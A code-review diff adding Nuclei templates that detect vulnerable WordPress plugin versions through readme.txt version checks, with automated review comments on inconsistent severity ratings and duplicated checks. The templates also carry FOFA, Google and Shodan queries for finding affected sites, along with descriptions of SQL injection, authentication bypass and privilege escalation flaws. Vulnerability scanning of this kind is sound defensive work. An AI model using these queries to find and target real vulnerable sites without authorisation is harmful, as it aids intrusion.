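Review bot: `classification` carries the CVSS vector, score and `cwe-id` but no `cve-id: CVE-2024-27199`, unlike every other CVE template in this patch; add it so the finding is keyed to the CVE. The three traversal paths only work if the `..` segments reach TeamCity un-normalized; the engine sends `path:` entries literally, but a comment such as `# paths rely on the raw '..' segment; do not let a proxy or client normalize it` would stop a future cleanup from breaking the check.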
@@ -0,0 +1,59 @@ +id: CVE-2024-5416 + +info: + name: > + Elementor Website Builder – More than Just a Page Builder <= 3.23.4 - Authenticated (Contributor+) Stored Cross-Site Scripting in the URL Parameter in Multiple Widgets + author: topscoder + severity: low + description: > + The Elementor Website Builder – More than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the url parameter of multiple widgets in all versions up to, and including, 3.23.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in Elementor Editor pages. This was partially patched in version 3.23.2. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a99a64f7-1ea8-4de6-b24f-1f69bf25c1f5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2024-5416 + metadata: + fofa-query: "wp-content/plugins/elementor/" + google-query: inurl:"/wp-content/plugins/elementor/" + shodan-query: 'vuln:CVE-2024-5416' + tags: cve,wordpress,wp-plugin,elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.23.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6335.yaml b/poc/cve/CVE-2024-6335.yaml new file mode 100644 index 0000000000..39fddb3c25 --- /dev/null 
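Review bot: `severity: low` and the `low` tag sit under a 5.4 (medium) CVSS vector for a contributor-level stored XSS; pick one rating or state in the description that `low` reflects a readme-version check rather than the CVE itself. The description notes the issue "was partially patched in version 3.23.2" while the matcher tests `<= 3.23.4`, which is correct but not obvious; a comment beside `compare_versions` such as `# partial fix in 3.23.2, complete fix after 3.23.4` would help.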
+++ b/poc/cve/CVE-2024-6335.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6335 + +info: + name: > + Tracking Code Manager <= 2.2.0 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Tracking Code Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9bd1fe45-8518-429b-94d3-cc0ea06ca1b4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-6335 + metadata: + fofa-query: "wp-content/plugins/tracking-code-manager/" + google-query: inurl:"/wp-content/plugins/tracking-code-manager/" + shodan-query: 'vuln:CVE-2024-6335' + tags: cve,wordpress,wp-plugin,tracking-code-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tracking-code-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tracking-code-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.0') \ No newline at end of file 
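Review bot: The description says the issue only affects multisite installs or sites where `unfiltered_html` is disabled, but the template checks nothing beyond `Stable tag <= 2.2.0` from readme.txt and cannot see either condition, so most hits will be non-exploitable. Add `# version check only; the multisite / unfiltered_html preconditions are not verified` under `matchers:` or fold that sentence into the description. With `PR:H` and a 4.4 score `severity: low` is defensible, but say why.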
diff --git a/poc/cve/CVE-2024-7626.yaml b/poc/cve/CVE-2024-7626.yaml new file mode 100644 index 0000000000..871445df87 --- /dev/null +++ b/poc/cve/CVE-2024-7626.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-7626 + +info: + name: > + WP Delicious – Recipe Plugin for Food Bloggers (formerly Delicious Recipes) <= 1.6.9 - Improper Path Validation to Authenticated (Subscriber+) Arbitrary File Move and Read + author: topscoder + severity: low + description: > + The WP Delicious – Recipe Plugin for Food Bloggers (formerly Delicious Recipes) plugin for WordPress is vulnerable to arbitrary file movement and reading due to insufficient file path validation in the save_edit_profile_details() function in all versions up to, and including, 1.6.9. This makes it possible for authenticated attackers, with subscriber-level access and above, to move arbitrary files on the server, which can easily lead to remote code execution when the right file is moved (such as wp-config.php). This can also lead to the reading of arbitrary files that may contain sensitive information like wp-config.php. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3c98bb53-9f7e-4ab3-9676-e3dbfb4a0519?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N + cvss-score: 8.1 + cve-id: CVE-2024-7626 + metadata: + fofa-query: "wp-content/plugins/delicious-recipes/" + google-query: inurl:"/wp-content/plugins/delicious-recipes/" + shodan-query: 'vuln:CVE-2024-7626' + tags: cve,wordpress,wp-plugin,delicious-recipes,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/delicious-recipes/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "delicious-recipes" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 
1.6.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7721.yaml b/poc/cve/CVE-2024-7721.yaml new file mode 100644 index 0000000000..92656f4254 --- /dev/null +++ b/poc/cve/CVE-2024-7721.yaml 
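Review bot: `severity: low` and the `low` tag contradict an 8.1 CVSS vector (`C:H/I:H`, subscriber level) and a description that says the bug "can easily lead to remote code execution"; if `low` is meant to say this is a version-only readme check, state that in the description, otherwise set `severity: high`. The `compare_versions(version, '<= 1.6.9')` line is split across the chunk boundary here, so the whole matcher was reviewed from both halves.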
@@ -0,0 +1,59 @@ +id: CVE-2024-7721 + +info: + name: > + HTML5 Video Player – mp4 Video Player Plugin and Block <= 2.5.34 - Missing Authorization to Authenticated (Subscriber+) Limited Options Update + author: topscoder + severity: low + description: > + The HTML5 Video Player – mp4 Video Player Plugin and Block plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_password' function in all versions up to, and including, 2.5.34. This makes it possible for authenticated attackers, with Subscriber-level access and above, to set any options that are not explicitly checked as false to an array, including enabling user registration if it has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6dc3f308-d1e1-430b-bccd-168c0972fe7c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-7721 + metadata: + fofa-query: "wp-content/plugins/html5-video-player/" + google-query: inurl:"/wp-content/plugins/html5-video-player/" + shodan-query: 'vuln:CVE-2024-7721' + tags: cve,wordpress,wp-plugin,html5-video-player,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/html5-video-player/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "html5-video-player" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.34') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7727.yaml b/poc/cve/CVE-2024-7727.yaml new file mode 100644 index 0000000000..977bf07998 --- /dev/null 
+++ b/poc/cve/CVE-2024-7727.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7727 + +info: + name: > + HTML5 Video Player – mp4 Video Player Plugin and Block <= 2.5.32 - Missing Authorization in multiple functions via h5vp_ajax_handler + author: topscoder + severity: high + description: > + The HTML5 Video Player – mp4 Video Player Plugin and Block plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on multiple functions called via the 'h5vp_ajax_handler' ajax action in all versions up to, and including, 2.5.32. This makes it possible for unauthenticated attackers to call these functions to manipulate data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/908df18e-7178-4d40-becb-86e1a714a7da?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-7727 + metadata: + fofa-query: "wp-content/plugins/html5-video-player/" + google-query: inurl:"/wp-content/plugins/html5-video-player/" + shodan-query: 'vuln:CVE-2024-7727' + tags: cve,wordpress,wp-plugin,html5-video-player,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/html5-video-player/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "html5-video-player" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.32') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8045.yaml b/poc/cve/CVE-2024-8045.yaml new file mode 100644 index 0000000000..62947a6422 --- /dev/null +++ b/poc/cve/CVE-2024-8045.yaml 
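Review bot: `severity: high` and the `high` tag overstate a 5.3 CVSS (`C:N/I:L/A:N`) missing-authorization bug, while sibling templates in this patch rate 8.1 and 8.8 findings `low`; either set `medium` to match the score or apply one convention across the batch. This template and the CVE-2024-7721 one for the same plugin send an identical `readme.txt` request with identical extractors, so each host gets two copies of the same fetch; a comment noting the shared request would at least make the duplication deliberate.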
@@ -0,0 +1,59 @@ +id: CVE-2024-8045 + +info: + name: > + Advanced WordPress Backgrounds <= 1.12.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via imageTag Parameter + author: topscoder + severity: low + description: > + The Advanced WordPress Backgrounds plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘imageTag’ parameter in all versions up to, and including, 1.12.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/78e49869-5e7e-45f2-8239-4df18b28db53?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8045 + metadata: + fofa-query: "wp-content/plugins/advanced-backgrounds/" + google-query: inurl:"/wp-content/plugins/advanced-backgrounds/" + shodan-query: 'vuln:CVE-2024-8045' + tags: cve,wordpress,wp-plugin,advanced-backgrounds,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/advanced-backgrounds/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "advanced-backgrounds" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.12.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8253.yaml b/poc/cve/CVE-2024-8253.yaml new file mode 100644 index 0000000000..58d9f544cb --- /dev/null +++ b/poc/cve/CVE-2024-8253.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-8253 + +info: + name: > + Post Grid and Gutenberg Blocks 2.2.87 - 2.2.90 - Authenticated (Subscriber+) Privilege Escalation + author: topscoder + severity: low + description: > + The Post Grid and Gutenberg Blocks plugin for WordPress is vulnerable to privilege escalation in all versions 2.2.87 to 2.2.90. This is due to the plugin not properly restricting what user meta values can be updated and ensuring a form is active. This makes it possible for authenticated attackers, with subscriber-level access and above, to update their user meta to become an administrator. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f5f18cae-b7f8-4afd-adfa-c616c63f9419?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-8253 + metadata: + fofa-query: "wp-content/plugins/post-grid/" + google-query: inurl:"/wp-content/plugins/post-grid/" + shodan-query: 'vuln:CVE-2024-8253' + tags: cve,wordpress,wp-plugin,post-grid,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/post-grid/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "post-grid" + part: body + + - type: dsl + dsl: + - compare_versions(version, '>= 2.2.87', '<= 2.2.90') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8277.yaml b/poc/cve/CVE-2024-8277.yaml new file mode 100644 index 0000000000..5530d1b4a1 --- /dev/null +++ b/poc/cve/CVE-2024-8277.yaml 
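Review bot: `severity: low` is attached to a subscriber-to-administrator privilege escalation scored 8.8; the range check `compare_versions(version, '>= 2.2.87', '<= 2.2.90')` is the right shape, but the rating will bury a full-compromise finding in reports. Set `severity: high` (or `critical` per repository convention), and keep `low` only if the description states that the template is a version fingerprint rather than an exploit check.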
@@ -0,0 +1,59 @@
+id: CVE-2024-8277
+
+info:
+ name: >
+ WooCommerce Photo Reviews Premium <= 1.3.13.2 - Authentication Bypass to Account Takeover and Privilege Escalation
+ author: topscoder
+ severity: critical
+ description: >
+ The WooCommerce Photo Reviews Premium plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.3.13.2. This is due to the plugin not properly validating what user transient is being used in the login() function and not properly verifying the user's identity. This makes it possible for unauthenticated attackers to log in as user that has dismissed an admin notice in the past 30 days, which is often an administrator. Alternatively, a user can log in as any user with any transient that has a valid user_id as the value, though it would be more difficult to exploit this successfully.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a1e2d370-a716-4d6b-8e23-74db2fbd0760?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-8277
+ metadata:
+ fofa-query: "wp-content/plugins/woocommerce-photo-reviews/"
+ google-query: inurl:"/wp-content/plugins/woocommerce-photo-reviews/"
+ shodan-query: 'vuln:CVE-2024-8277'
+ tags: cve,wordpress,wp-plugin,woocommerce-photo-reviews,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/woocommerce-photo-reviews/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "woocommerce-photo-reviews"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 
1.3.13.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8440.yaml b/poc/cve/CVE-2024-8440.yaml
new file mode 100644
index 0000000000..d202c64bb2
--- /dev/null
+++ b/poc/cve/CVE-2024-8440.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8440
+
+info:
+ name: >
+ Essential Addons for Elementor -- Best Elementor Templates, Widgets, Kits & WooCommerce Builders <= 6.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Fancy Text Widget
+ author: topscoder
+ severity: low
+ description: >
+ The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Fancy Text widget in all versions up to, and including, 6.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c5960396-5320-4978-aa82-2e33700daa43?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-8440
+ metadata:
+ fofa-query: "wp-content/plugins/essential-addons-for-elementor-lite/"
+ google-query: inurl:"/wp-content/plugins/essential-addons-for-elementor-lite/"
+ shodan-query: 'vuln:CVE-2024-8440'
+ tags: cve,wordpress,wp-plugin,essential-addons-for-elementor-lite,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "essential-addons-for-elementor-lite"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, 
'<= 6.0.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8522-29b9e24c70ba3cd60461931eec1fd527.yaml b/poc/cve/CVE-2024-8522-29b9e24c70ba3cd60461931eec1fd527.yaml
new file mode 100644
index 0000000000..547d9580aa
--- /dev/null
+++ b/poc/cve/CVE-2024-8522-29b9e24c70ba3cd60461931eec1fd527.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8522-29b9e24c70ba3cd60461931eec1fd527
+
+info:
+ name: >
+ LearnPress – WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_only_fields'
+ author: topscoder
+ severity: critical
+ description: >
+ The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_only_fields' parameter of the /wp-json/learnpress/v1/courses REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e495507d-7eac-4f38-ab6f-b8f0809b2be4?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10
+ cve-id: CVE-2024-8522
+ metadata:
+ fofa-query: "wp-content/plugins/learnpress/"
+ google-query: inurl:"/wp-content/plugins/learnpress/"
+ shodan-query: 'vuln:CVE-2024-8522'
+ tags: cve,wordpress,wp-plugin,learnpress,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/learnpress/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "learnpress"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.2.7')
\ No newline at end of file
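Review bot: This template and the CVE-2024-8529 one two hunks below perform exactly the same check — same `readme.txt` path, same `learnpress` word match, same `compare_versions(version, '<= 4.2.7')` — so every host one reports is reported by the other as well, and the result does not tell the reader which REST endpoint is affected. If both files must exist for CVE bookkeeping, a comment such as `# same readme-based version check as CVE-2024-8529; the two CVEs differ only in the affected REST parameter` would explain the duplication. The `id` also carries a hash suffix (`CVE-2024-8522-29b9e24c…`) while `cve-id` is the bare CVE number, unlike the other new templates in this commit where the two match; the same applies to the CVE-2024-8529 and CVE-2024-8622 hunks.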
diff --git a/poc/cve/CVE-2024-8529-e2a9975debb93f28e1a8c207f744d964.yaml b/poc/cve/CVE-2024-8529-e2a9975debb93f28e1a8c207f744d964.yaml
new file mode 100644
index 0000000000..fee43e24ab
--- /dev/null
+++ b/poc/cve/CVE-2024-8529-e2a9975debb93f28e1a8c207f744d964.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8529-e2a9975debb93f28e1a8c207f744d964
+
+info:
+ name: >
+ LearnPress – WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_fields'
+ author: topscoder
+ severity: critical
+ description: >
+ The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_fields' parameter of the /wp-json/lp/v1/courses/archive-course REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c2b2671e-0db7-4ba9-b574-a0122959e8fc?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10
+ cve-id: CVE-2024-8529
+ metadata:
+ fofa-query: "wp-content/plugins/learnpress/"
+ google-query: inurl:"/wp-content/plugins/learnpress/"
+ shodan-query: 'vuln:CVE-2024-8529'
+ tags: cve,wordpress,wp-plugin,learnpress,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/learnpress/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "learnpress"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.2.7')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3.yaml b/poc/cve/CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3.yaml
new file mode 100644
index 0000000000..7d1bcfee4c
--- /dev/null
+++ b/poc/cve/CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3
+
+info:
+ name: >
+ amCharts: Charts and Maps <= 1.4.4 - Reflected Cross-Site Scripting via Cross-Site Request Forgery
+ author: topscoder
+ severity: medium
+ description: >
+ The amCharts: Charts and Maps plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'amcharts_javascript' parameter in all versions up to, and including, 1.4.4 due to the ability to supply arbitrary JavaScript a lack of nonce validation on the preview functionality. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5e3593e8-3840-4db0-8269-61bbcb50d569?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-8622
+ metadata:
+ fofa-query: "wp-content/plugins/amcharts-charts-and-maps/"
+ google-query: inurl:"/wp-content/plugins/amcharts-charts-and-maps/"
+ shodan-query: 'vuln:CVE-2024-8622'
+ tags: cve,wordpress,wp-plugin,amcharts-charts-and-maps,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/amcharts-charts-and-maps/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "amcharts-charts-and-maps"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.4')
\ No newline at end of file
diff --git a/poc/cve/cve-2018-3714.yaml b/poc/cve/cve-2018-3714.yaml
index 50093afd70..e44ca7a0b5 100644
--- a/poc/cve/cve-2018-3714.yaml +++ b/poc/cve/cve-2018-3714.yaml @@ -1,18 +1,16 @@ id: CVE-2018-3714 - info: name: node-srv Path Traversal author: madrobot severity: medium - description: node-srv node module suffers from a Path Traversal vulnerability due to lack of validation of url, which allows a malicious user to read content of any file with known path. - reference: - - https://hackerone.com/reports/309124 + reference: https://hackerone.com/reports/309124 + tags: cve,cve2018,nodejs,lfi classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.5 + cvss-score: 6.50 cve-id: CVE-2018-3714 cwe-id: CWE-22 - tags: cve,cve2018,nodejs,lfi + description: "node-srv node module suffers from a Path Traversal vulnerability due to lack of validation of url, which allows a malicious user to read content of any file with known path." requests: - method: GET diff --git a/poc/cve/cve-2020-26876.yaml b/poc/cve/cve-2020-26876.yaml index eac2144278..6559ee1788 100644 --- a/poc/cve/cve-2020-26876.yaml +++ b/poc/cve/cve-2020-26876.yaml 
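Review bot: The new side of this hunk reverts the template to an older layout rather than improving it: `cvss-score: 6.5` becomes `cvss-score: 6.50`, the `reference` list is collapsed into a scalar, and `tags` moves above `classification`, none of which changes what the template detects. The same reversion is larger in the cve-2020-26876 hunk that follows, where `http:` is replaced by the legacy `requests:` key, `cvss-metrics`, `cwe-id`, `cpe`, `epss-score` and the whole `metadata` block are dropped, and the signed `# digest:` line gives way to a `# Enhanced by mp on 2022/03/21` comment, so that template is no longer signed. If the intent is to mirror an upstream snapshot, the newer revisions are the ones worth keeping; otherwise at least `cvss-score: 6.5` here and the `http:` key plus the `classification` fields in cve-2020-26876 should be retained.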
@@ -1,57 +1,36 @@ id: CVE-2020-26876 - info: name: WordPress WP Courses Plugin Information Disclosure author: dwisiswant0 severity: high description: WordPress WP Courses Plugin < 2.0.29 contains a critical information disclosure which exposes private course videos and materials. - impact: | - An attacker can exploit this vulnerability to gain sensitive information about the WordPress WP Courses Plugin. - remediation: | - Update to the latest version of the WordPress WP Courses Plugin (1.0.9) to fix the information disclosure vulnerability. + tags: wordpress,plugin reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-26876 - https://www.exploit-db.com/exploits/48910 - https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/ - - https://plugins.trac.wordpress.org/changeset/2388997 - - https://plugins.trac.wordpress.org/changeset/2389243 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 cve-id: CVE-2020-26876 - cwe-id: CWE-306 - epss-score: 0.01988 - epss-percentile: 0.8756 - cpe: cpe:2.3:a:wpcoursesplugin:wp-courses:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: wpcoursesplugin - product: wp-courses - framework: wordpress - tags: cve,cve2020,wordpress,wp-plugin,exposure,edb,wpcoursesplugin - -http: +requests: - method: GET path: - "{{BaseURL}}/wp-json/wp/v2/lesson/1" - matchers-condition: and matchers: - - type: word - part: header - words: - - "application/json" - - type: regex - part: body regex: - "rest_post_invalid_id" - "\"(guid|title|content|excerpt)\":{\"rendered\":" condition: or - + part: body + - type: word + words: + - "application/json" + part: header - type: status status: - 200 - 404 condition: or -# digest: 